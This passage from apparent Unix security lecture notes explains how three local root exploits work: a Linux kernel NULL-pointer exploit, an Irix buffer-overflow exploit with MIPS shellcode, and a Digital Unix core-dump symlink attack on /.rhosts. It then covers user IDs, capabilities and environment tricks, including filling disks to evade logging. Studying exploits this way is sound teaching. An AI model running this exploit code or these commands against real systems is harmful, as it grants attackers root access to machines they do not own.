                "movl %3, 0x04(%%esp) ;"
                "movl %4, 0x00(%%esp) ;"
                "iret"
                : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
                    "i" (USER_CS), "r" (exit_code)
        );
}

void kernel_code()
{
        int i;
        uint *p = get_current();

        for (i = 0; i < 1024-13; i++) {
                if (p[0] == uid && p[1] == uid &&
                    p[2] == uid && p[3] == uid &&
                    p[4] == gid && p[5] == gid &&
                    p[6] == gid && p[7] == gid) {
                        p[0] = p[1] = p[2] = p[3] = 0;
                        p[4] = p[5] = p[6] = p[7] = 0;
                        p = (uint *) ((char *)(p + 8) + sizeof(void *));
                        p[0] = p[1] = p[2] = ~0;
                        break;
                }
                p++;
        }

        exit_kernel();
}

void exit_code()
{
        if (getuid() != 0) {
                fprintf(stderr, "failed\n");
                exit(-1);
        }

        execl("/bin/sh", "sh", "-i", NULL);
}

int main(void) {
        char template[] = "/tmp/padlina.XXXXXX";
        int fdin, fdout;
        void *page;

        uid = getuid();
        gid = getgid();
        setresuid(uid, uid, uid);
        setresgid(gid, gid, gid);

        if ((personality(0xffffffff)) != PER_SVR4) {
                if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
                        perror("mmap");
                        return -1;
                }
        } else {
                if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 
0) {
                        perror("mprotect");
                        return -1;
                }
        }

        *(char *)0 = '\x90';
        *(char *)1 = '\xe9';
        *(unsigned long *)2 = (unsigned long)&kernel_code - 6;

        if ((fdin = mkstemp(template)) < 0) {
                perror("mkstemp");
                return -1;
        }

        if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
                perror("socket");
                return -1;
        }

        unlink(template);
        ftruncate(fdin, PAGE_SIZE);
        sendfile(fdout, fdin, NULL, PAGE_SIZE);
}

And indeed:

% gcc -o run run.c && gcc -o exploit exploit.c && ./run
padlina z lublina!
sh-3.00#

What happens? We have seen get_current() and exit_kernel() and kernel_code() and exit_code() in the vmsplice exploit above. As before, we somehow get the kernel to call kernel_code(), which sets uid and gid to 0 and gives us all capabilities, and then returns to exit_code() and starts a root shell. The new part is that we store 0x90 (nop), 0xe9 (jump) and a value A at addresses 0, 1, and 2-5. (The jump is relative, and the next instruction starts at address 6, so the jump will jump to A+6, that is, to kernel_code.) It remains to get the kernel to jump to address 0 where our code is waiting. But the sendfile() causes the kernel to do

static ssize_t sock_sendpage(...)
{
        ...
        return sock->ops->sendpage(sock, page, offset, size, flags);
}
and for the PF_PPPOX protocol family that pointer is NULL.

Finally, why the personality nonsense? In the SVR4 personality we have access to page 0.

12.6 An Irix example

Remotely logged in into some Irix machine:

$ ./x 123.123.123.123:0
copyright LAST STAGE OF DELIRIUM jun 2003 poland  //lsd-pl.net/
libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 IP:ALL

Warning: Color name "SGIVeryLightGrey" is not defined
# id
uid=100(aeb) gid=100(foo) euid=0(root)
where 123.123.123.123:0 points at the display of my home machine. A local root exploit. I did this in good script-kiddie style, before understanding what happened. But what happens?

The binary ./x was compiled from

/*## copyright LAST STAGE OF DELIRIUM jun 2003 poland *://lsd-pl.net/ #*/
/*## libdesktopicon.so $HOME                                          #*/

#define NOPNUM 1300
#define ADRNUM 900
#define PCHNUM 400

char setreuidcode[]=
    "\x30\x0b\xff\xff"    /* andi    $t3,$zero,0xffff     */
    "\x24\x02\x04\x01"    /* li      $v0,1024+1           */
    "\x20\x42\xff\xff"    /* addi    $v0,$v0,-1           */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "\x30\x44\xff\xff"    /* andi    $a0,$v0,0xffff       */
    "\x31\x65\xff\xff"    /* andi    $a1,$t3,0xffff       */
    "\x24\x02\x04\x64"    /* li      $v0,1124             */
    "\x03\xff\xff\xcc"    /* syscall                      */
;

char shellcode[]=
    "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
    "\x24\x02\x03\xf3"    /* li      $v0,1011             */
    "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
    "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
    "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
    "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
    "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
    "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
    "\x03\xff\xff\xcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
    "\x03\xe0\x00\x08"    /* jr      $ra                  */
;

char nop[]="\x24\x0f\x12\x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b,*envp[2];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM jun 2003 poland  //lsd-pl.net/\n");
    printf("libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 ");
    printf("IP:ALL\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8580+3056+600;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8580+400+31552;

    envp[0]=buffer;
    envp[1]=0;

    b=buffer;
    sprintf(b,"HOME=");
    b+=5;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    execle("/usr/sbin/printers","lsd","-display",argv[1],0,envp);
}

It is clear that this is an exploit of /usr/sbin/printers, using a buffer overflow involving the HOME environment variable. And indeed, that program is setuid root, so we can expect profit from a buffer overflow:

# ls -l /usr/sbin/printers
-rwsr-xr-x    1 root     sys       226356 Dec  7  2001 /usr/sbin/printers
# uname -R
6.5 6.5.14m

About the assembler code used, some details are explained by the authors. For some more info on MIPS/IRIX, see Phrack 56#16. First of all, the code is big-endian, for use with IRIX.

The address of the shellcode is obtained using the bltzal $zero instruction. This instruction is a Branch if Less Than Zero And Link, that tests whether 0 is negative and jumps if it is (but it isn't), and writes the return address of this conditional subroutine call, that is, the address shellcode+8, in the $ra register.

The li (load immediate) instruction here fills the delay slot. It is not a dummy: the $v0 register specifies which systemcall is done. Here 0x3f3=1011 is the execv system call. (System call numbers can be found on an IRIX machine in /usr/include/sys.s.)

In order to obtain the address of the /bin/sh string, we first add 276 and then subtract 248. This is done in this convoluted way because directly adding 28 would involve a 16-bit operand with a zero byte, which cannot be used in a string.

The execv system call is completed by storing the address of the /bin/sh string, then a NULL, and finally a NUL byte terminating the /bin/sh string.

That explains the shellcode[] array. Concerning the setreuidcode[] array: 1024 is the getuid() system call, 1124 is the setreuid() system call. The effect is that we do setreuid(getuid(),0), which sets the effective user ID back to 0 - useful in case of a setuid executable that drops privileges but has a saved user ID that still remembers its former powers. (See also below.)

The peculiar invocations of jump[] read the value of the stack pointer. The return jump needs some instruction to fill the delay slot, and conveniently there is that nop[] array following.

We make an environment that consists only of the HOME= string. That string is filled with 900/4 copies of the address adr, 400/4 copies of the address pch, some padding to correct alignment, 1300/4 NOPs, and the exploit code. The addresses are not aligned in the array buffer, but will be aligned when returned by getenv("HOME").

Remains to explain the final details of the array overflow.

12.7 The Unix permission system

In a Unix-like environment each process has a real user ID, the ID of the user that started the program, an effective user ID, the ID of the user whose powers determine what the program is allowed to do, and a saved user ID, that remembers an earlier effective user ID.

Users can belong to groups, and each process has a real group ID, possibly some supplementary group IDs, an effective group ID, and a saved group ID.

The details are a real mess, and that means that there are lots of security problems with this setup.

User ID

A Unix user has a user ID (uid), a number that encodes his identity. The file /etc/passwd will give the correspondence between name and uid.

A Unix process has a (real) uid, probably inherited from its parent, that indicates what user is running the process. The user logged in, and the login program gave her a shell with approprite uid, and this uid is inherited across forks.

Traditionally, root, the user with user ID 0, is all-powerful.

Effective user ID

Sometimes a user needs to run a program that can do more than she can do herself. She plays a game, and the program must update the highscore list. She sends mail, and the program must update the mailbox of the recipient. She changes her password, and the password file must be updated. The powers of a program are determined by its effective user ID (euid). Normally the effective user ID equals the user ID of the user that runs the program, but when the mode of the program binary has the setuid bit set, the real user ID of the executing program will be that of the user (process) that started it, but the effective user ID will be the user ID of the owner of the program binary. For example:

-rwsr-xr-x    1 root     root        65008 2004-03-05 03:16 /bin/mount
Ordinary people can run /bin/mount and perhaps do things that require root permission. It is up to the program to find out what it is willing to do for that user.

Saved user ID

Setuid root processes are a security problem because they can do everything, and have to be very careful not to be tricked by the user running them. In order to make life easier for the authors of such programs, POSIX introduced the saved effective user ID. A process can drop its privileges by setting its effective user ID to its real user ID, while the saved effective user ID remembers the previous value. Later, when it needs this power again, the process can set its effective user ID again to its saved effective user ID. Now large parts of the program code will run without any special powers and the risk of being tricked is decreased.

The saved effective user ID is set to the effective user ID directly after each exec.

(Note: "setuid" is often abbreviated "suid", but also "saved effective user ID" is abbreviated so.)

fsuid

In order to make it easier for an NFS server to serve files to many different users, Linux introduced the filesystem user ID. Usually equal to the effective user ID, but the NFS server that runs with effective user ID 0 (for root) can set its fsuid to that of the user who asks for a file. See setfsuid(2).

Capabilities

An all-powerful user root leads to problems. People have tried to split the root power into many different capabilities. See capset(2). The capability system is not used very much. Often it turns out that if one gives someone part of roots power, this can be used to obtain full root power. But the capability system exists, and while it was meant to allow to set up a more secure system, so far it has mostly resulted in more insecurity.

The problem is that not many programmers know about capabilities. The details are badly documented. And a hacker can abuse the capability system and start a setuid root program in such a way that it lacks some capabilities. Now some of its actions will unexpectedly fail. For example, it may be that its attempt to drop privileges will fail. (Sendmail local root exploit, June 2000, Linux 2.2.15, fixed in 2.2.16.)

Details

These details are for recent Linux systems. Note that details have changed a lot over time, and also are a bit different on other Unix-type systems like *BSD, Solaris, etc.

There are of course many more details. Read the source. (There are 16-bit and 32-bit versions of these calls, and conversions. Calls like setuid() may fail when the maximum number of processes for the target user has been reached. Etc.)

fork

The values of ruid, euid, suid, fsuid, CAP_SETUID are inherited across forks.

exec

If the filesystem was mounted NOSUID, the values of ruid, euid, suid, fsuid are not changed upon an exec(). Otherwise, the value of ruid is preserved, the values of euid and fsuid are preserved when the file executed did not have the setuid bit set, and are set to the owner ID of the file when the setuid bit was set, and finally suid is set to euid.

mount

The MS_NOSUID flag specified for a mount determines whether setuid and setgid bits are honoured with an execve().

setuid

If the invoker has CAP_SETUID then the call setuid(u) sets all of ruid, euid, fsuid, suid to u. Otherwise this call fails if u is not one of ruid, suid, and otherwise sets euid and fsuid to u.

seteuid

The call seteuid(e) sets euid to e. If will fail unless the invoker has CAP_SETUID or e is one of ruid, euid, suid.

setreuid

The call setreuid(r,e) sets ruid, euid to r,e, respectively, or leaves them unchanged when the corresponding parameter is -1. This call will fail unless the process has the CAP_SETUID capability or r is one of -1, ruid, euid and e is one of -1, ruid, euid, suid. If r was not -1 or e was not -1 and not the old ruid, then suid is set to the new euid. Finally fsuid is made equal to the new euid

setresuid

The call setresuid(r,e,s) sets ruid, euid, suid to r,e,s, respectively, or leaves them unchanged when the corresponding parameter is -1. This call will fail unless the process has the CAP_SETUID capability or each of r,e,s are equal to one of -1, ruid, euid, suid.

Capabilities

There is a set of possible permissions (for a list, see capabilities(7)), and subsets of it are indicated by bitmasks. There is cap_effective, the set of presently enabled capabilities, and cap_permitted, the set of capabilities that this process can enable, and cap_inheritable, the maximum set of capabilities that a child may have. Normally, an ordinary process has none of these capabilities, and root has all of them. System calls are capget(2) and capset(2).

prctl

If a process changes from being root (in the weak sense that at least one of ruid, euid, suid is zero) to being non-root (ruid, euid, suid all nonzero), then by default all capabilities are dropped. However, each process has a "keep capabilities" flag, and if that is set capabilities are not dropped upon becoming non-root. The call prctl(PR_SET_KEEPCAPS,b); (where b is either 0 or 1), sets this "keep capabilities" flag to b.

CAP_SETUID

This is the capability checked by the system calls setuid(), setreuid(), setresuid(), and setfsuid(). This capability allows a process to change user IDs arbitrarily. There is also a corresponding CAP_SETGID.

12.8 Modified system environment

One can run a setuid binary in a modified environment, presenting conditions it was not programmed to handle.

Standard I/O

Most programs expect file descriptors 0, 1, 2 (stdin, stdout, stderr) to be suitable for reading, writing, and writing error messages. But if the invoker of a setuid binary closes for example file descriptor 2 before the exec, then the first file opened by this binary will get file descriptor 2, and a later error message is written to this file.

argv

Most programs expect argv[0] to contain the name that was used to invoke them. But the invoker can make argv[0] an arbitrary string. (This is also used legitimately - for example, for the shell a leading '-' in argv[0] used to be an indicator that this shell was a login shell.) But if a naive program, like sendmail, re-execs itself doing execv(argv[0],argv);, then we have a local root exploit. (1996)

Disk full

Create some very large files so that the disk is full or very nearly full. Not many programs handle the disk full situation well. Output files may be truncated. Programs may crash.

(Filling up a disk can also be a way to make sure what you do afterwards will not be logged by syslog.)

It may be possible to cause a remote disk full condition. A good compressor will compress a very large constant file (say 20 GB of NULs) to something rather small. Send it as attachment in a letter. Watch the anti-virus software of the receiver unpack it.. Some anti-virus software now detects precisely this: a very large file of NULs. But then a very large and very compressible file with something else works.

Stack overflow

Similarly, not many programs expect a stack overflow. But ulimit -s 100; foo starts the program foo in an environment with very small stack. Probably it will segfault. Let us try.

% ulimit -s 100; mount /zip
% umount /zip
% ulimit -s 10; mount /zip
Segmentation fault
Sometimes it is possible to exploit the messy half-finished situation that is left behind when a program segfaults halfway.

There are other resource limits one can play with. Read bash(1), ulimit(3), getrlimit(2), setrlimit(2), sysconf(3).

Pending signal

One cannot send signals from unprivileged to privileged processes.

(Indeed, the standard says: For a process to have permission to send a signal to a process designated by pid, unless the sending process has appropriate privileges, the real or effective user ID of the sending process shall match the real or saved set-user-ID of the receiving process.)

But an unprivileged process can set up an alarm signal to be sent after a prespecified time, and then fork off the setuid binary. Maybe it is killed in the middle of what it was doing, leaving an exploitable messy situation.

Core dumps

Often, core dump files have a predictable name. Sometimes just core. If one plans to make a setuid program dump core it may be useful to have a link or symlink named core in the directory where core will be dumped. Sometimes one can overwrite an arbitrary file in this way.

For example, the following exploit for Digital Unix 4.0 was found by rusty@mad.it and soren@atlink.it.

$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x   1 root     bin        32768 Nov 16  1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1]    Segmentation fault   /usr/sbin/ping somehost (core dumped)
[2]    +Segmentation fault   /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw-------   1 root     system    385024 Mar 29 05:17 /.rhosts
$ rlogin localhost -l root
That is, here core is made a symlink to /.rhosts, and by defining a suitable environment variable we make sure that a core file will contain a given string, here one that gives universal entrance permission, then kill the setuid binary with a signal causing a core dump.

There have been many exploits in this direction. A secure system must not allow core dumps of setuid binaries or binaries that were executable only (perhaps they have embedded passwords that should not become readable), or core dumps to a symlink.

The current Linux kernel has for each process a flag dumpable. One can test (and change) its value from user space using the prctl() system call.

Exercise Under precisely what conditions will dumpable be set under the 2.6.0 kernel?


Next Previous Contents